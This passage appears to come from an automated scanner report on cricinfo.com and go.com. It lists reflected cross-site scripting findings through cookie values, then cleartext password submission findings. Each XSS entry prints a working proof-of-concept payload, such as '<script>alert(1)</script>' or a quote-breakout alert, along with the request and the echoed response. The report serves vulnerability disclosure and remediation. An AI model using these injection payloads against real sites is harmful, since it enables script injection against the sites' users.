<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: usb19ab--><script>alert(1)</script>f7e4260af65, cluster: usa, created: 2010-11-07 03:13:12 -->
...[SNIP]...

5.174. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/poll/cast_vote.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69125'-alert(1)-'2c7a734ccab was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us69125'-alert(1)-'2c7a734ccab;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:09 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 82875
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us69125'-alert(1)-'2c7a734ccab, cluster: usa,
...[SNIP]...
<script language="javascript" type="text/javascript">
   ord=Math.random()*10000000000000000;

   cqanswer = 'us69125'-alert(1)-'2c7a734ccab';
</script>
...[SNIP]...

5.175. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3dc2"><script>alert(1)</script>9960f224455 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usaf3dc2"><script>alert(1)</script>9960f224455; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:02 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148607
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usaf3dc2"><script>alert(1)</scrip
...[SNIP]...
<a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaf3dc2"><script>alert(1)</script>9960f224455;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank">
...[SNIP]...

5.176. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload 8b612--><script>alert(1)</script>1e44d058545 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa8b612--><script>alert(1)</script>1e44d058545; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:11 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148612
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa8b612--><script>alert(1)</script>1e44d058545, created: 2010-11-07 03:17:11 -->
...[SNIP]...

5.177. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e37c2'-alert(1)-'56441d147b1 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usae37c2'-alert(1)-'56441d147b1; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:07 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148532
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usae37c2'-alert(1)-'56441d147b1,
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usae37c2'-alert(1)-'56441d147b1;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

5.178. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload 6c213--><script>alert(1)</script>88efb11a633 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6c213--><script>alert(1)</script>88efb11a633;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:56 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148480
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us6c213--><script>alert(1)</script>88efb11a633, cluster: usa, created: 2010-11-07 03:17:56 -->
...[SNIP]...

5.179. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de31'-alert(1)-'329e617c586 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6de31'-alert(1)-'329e617c586;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:53 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148448
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us6de31'-alert(1)-'329e617c586, cluster: usa,
...[SNIP]...
<script language="javascript" type="text/javascript">
   ord=Math.random()*10000000000000000;

   cqanswer = 'us6de31'-alert(1)-'329e617c586';
</script>
...[SNIP]...

5.180. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_screenname.html [Q_cricinfo_cluster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_screenname.html

Issue detail

The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload e4557--><script>alert(1)</script>390d9742830 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usae4557--><script>alert(1)</script>390d9742830; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:16:53 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 11716
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usae4557--><script>alert(1)</script>390d9742830, created: 2010-11-07 03:16:53 -->
...[SNIP]...

5.181. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_screenname.html [Q_cricinfo_country cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_screenname.html

Issue detail

The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload f68f3--><script>alert(1)</script>2111aaab520 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usf68f3--><script>alert(1)</script>2111aaab520;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:09 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 11716
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: usf68f3--><script>alert(1)</script>2111aaab520, cluster: usa, created: 2010-11-07 03:17:09 -->
...[SNIP]...

5.182. http://tredir.go.com/capmon/GetDE [DE2 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tredir.go.com
Path:   /capmon/GetDE

Issue detail

The value of the DE2 cookie is copied into the HTML document as plain text between tags. The payload 24949<script>alert(1)</script>07dfed796ff was submitted in the DE2 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /capmon/GetDE HTTP/1.1
Host: tredir.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==24949<script>alert(1)</script>07dfed796ff; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response

HTTP/1.1 200 OK
Connection: Close
Content-Length: 1179
Content-Type: text/html; charset=iso-8859-1
Server: Barista/3.3.6


174.121.222.18<br>DE2 Cookie = dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==24949<script>alert(1)</script>07dfed796ff<br>Geo Reponse = usa;tx;houston;b
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 6 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://www.cricinfo.com/ci/content/current/match/fixtures_futures.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /ci/content/current/match/fixtures_futures.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ci/content/current/match/fixtures_futures.html HTTP/1.1
Host: www.cricinfo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2171362-12c24636d70-46e75e48-2; VWCUKP300cricinfo=L0/Q52175_9650_5_110610_2_123110_305086x300231x110610x2x2/Q59823_11018_5_110610_1_123110_377616x375442x110610x1x1/Q54302_9880_5_110610_3_123110_346488x337926x110610x3x3/Q54305_9880_5_110510_1_123110_346490x338006x110610x1x1; SVWCUKP300cricinfo=305086_2/346488_3/346490_1/377616_1; s_pers=%20s_c24%3D1289100691322%7C1383708691322%3B%20s_c24_s%3DFirst%2520Visit%7C1289102491322%3B%20s_gpv_pn%3Dcricinfo%253Aglobal%253Anews%253Aespn%2520acquires%2520cricinfo%7C1289102491337%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=15
Content-Type: text/html; charset=UTF-8
X-Varnish: 718320174 718316111
X-Varnish-Cache: HIT
X-Varnish-Hits: 1
X-Varnish: 903891396
Vary: Accept-Encoding
Date: Sun, 07 Nov 2010 06:09:49 GMT
Connection: close
Content-Length: 118226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-07 06:06:51
...[SNIP]...
</div>
<form onSubmit="return ciLoginvalidate();" method="post" name="ciloginfm" id="ciloginfm" style="margin:0px; margin-top:4px; padding:0px;">
<ul id="cilogintxt" style="margin:0px;padding:0px">
...[SNIP]...
<li><input name="password" id="password" class="citextbox" type="password"></li>
...[SNIP]...

6.2. http://www.cricinfo.com/ci/content/current/story/news.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /ci/content/current/story/news.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ci/content/current/story/news.html HTTP/1.1
Host: www.cricinfo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2171362-12c24636d70-46e75e48-2; VWCUKP300cricinfo=L0/Q52175_9650_5_110610_2_123110_305086x300231x110610x2x2/Q59823_11018_5_110610_1_123110_377616x375442x110610x1x1/Q54302_9880_5_110610_3_123110_346488x337926x110610x3x3/Q54305_9880_5_110510_1_123110_346490x338006x110610x1x1; SVWCUKP300cricinfo=305086_2/346488_3/346490_1/377616_1; s_pers=%20s_c24%3D1289100691322%7C1383708691322%3B%20s_c24_s%3DFirst%2520Visit%7C1289102491322%3B%20s_gpv_pn%3Dcricinfo%253Aglobal%253Anews%253Aespn%2520acquires%2520cricinfo%7C1289102491337%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 718315684 718263184
X-Varnish-Cache: HIT
X-Varnish-Hits: 1
X-Varnish: 903885838
Vary: Accept-Encoding
Date: Sun, 07 Nov 2010 06:09:54 GMT
Connection: close
Content-Length: 114152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-07 06:03:49
...[SNIP]...
</div>
<form onSubmit="return ciLoginvalidate();" method="post" name="ciloginfm" id="ciloginfm" style="margin:0px; margin-top:4px; padding:0px;">
<ul id="cilogintxt" style="margin:0px;padding:0px">
...[SNIP]...
<li><input name="password" id="password" class="citextbox" type="password"></li>
...[SNIP]...

6.3. http://www.cricinfo.com/ci/content/page/417881.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /ci/content/page/417881.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ci/content/page/417881.html HTTP/1.1
Host: www.cricinfo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2171362-12c24636d70-46e75e48-2; VWCUKP300cricinfo=L0/Q52175_9650_5_110610_2_123110_305086x300231x110610x2x2/Q59823_11018_5_110610_1_123110_377616x375442x110610x1x1/Q54302_9880_5_110610_3_123110_346488x337926x110610x3x3/Q54305_9880_5_110510_1_123110_346490x338006x110610x1x1; SVWCUKP300cricinfo=305086_2/346488_3/346490_1/377616_1; s_pers=%20s_c24%3D1289100691322%7C1383708691322%3B%20s_c24_s%3DFirst%2520Visit%7C1289102491322%3B%20s_gpv_pn%3Dcricinfo%253Aglobal%253Anews%253Aespn%2520acquires%2520cricinfo%7C1289102491337%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 718366078
X-Varnish-Cache: MISS
X-Varnish: 903948715
Vary: Accept-Encoding
Date: Sun, 07 Nov 2010 06:09:45 GMT
Connection: close
Content-Length: 99775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci006, country: us, cluster: usa, created: 2010-11-07 06:09:44
...[SNIP]...
</div>
<form onSubmit="return ciLoginvalidate();" method="post" name="ciloginfm" id="ciloginfm" style="margin:0px; margin-top:4px; padding:0px;">
<ul id="cilogintxt" style="margin:0px;padding:0px">
...[SNIP]...
<li><input name="password" id="password" class="citextbox" type="password"></li>
...[SNIP]...

6.4. http://www.cricinfo.com/ci/engine/current/match/scores/live.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /ci/engine/current/match/scores/live.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ci/engine/current/match/scores/live.html HTTP/1.1
Host: www.cricinfo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2171362-12c24636d70-46e75e48-2; VWCUKP300cricinfo=L0/Q52175_9650_5_110610_2_123110_305086x300231x110610x2x2/Q59823_11018_5_110610_1_123110_377616x375442x110610x1x1/Q54302_9880_5_110610_3_123110_346488x337926x110610x3x3/Q54305_9880_5_110510_1_123110_346490x338006x110610x1x1; SVWCUKP300cricinfo=305086_2/346488_3/346490_1/377616_1; s_pers=%20s_c24%3D1289100691322%7C1383708691322%3B%20s_c24_s%3DFirst%2520Visit%7C1289102491322%3B%20s_gpv_pn%3Dcricinfo%253Aglobal%253Anews%253Aespn%2520acquires%2520cricinfo%7C1289102491337%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=15
Content-Type: text/html; charset=UTF-8
X-Varnish: 718364841
X-Varnish-Cache: MISS
X-Varnish: 903947186
Vary: Accept-Encoding
Date: Sun, 07 Nov 2010 06:09:46 GMT
Connection: close
Content-Length: 89215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-07 06:09:40
...[SNIP]...
</div>
<form onSubmit="return ciLoginvalidate();" method="post" name="ciloginfm" id="ciloginfm" style="margin:0px; margin-top:4px; padding:0px;">
<ul id="cilogintxt" style="margin:0px;padding:0px">
...[SNIP]...
<li><input name="password" id="password" class="citextbox" type="password"></li>
...[SNIP]...

6.5. http://www.cricinfo.com/ci/engine/current/match/scores/recent.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /ci/engine/current/match/scores/recent.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ci/engine/current/match/scores/recent.html HTTP/1.1
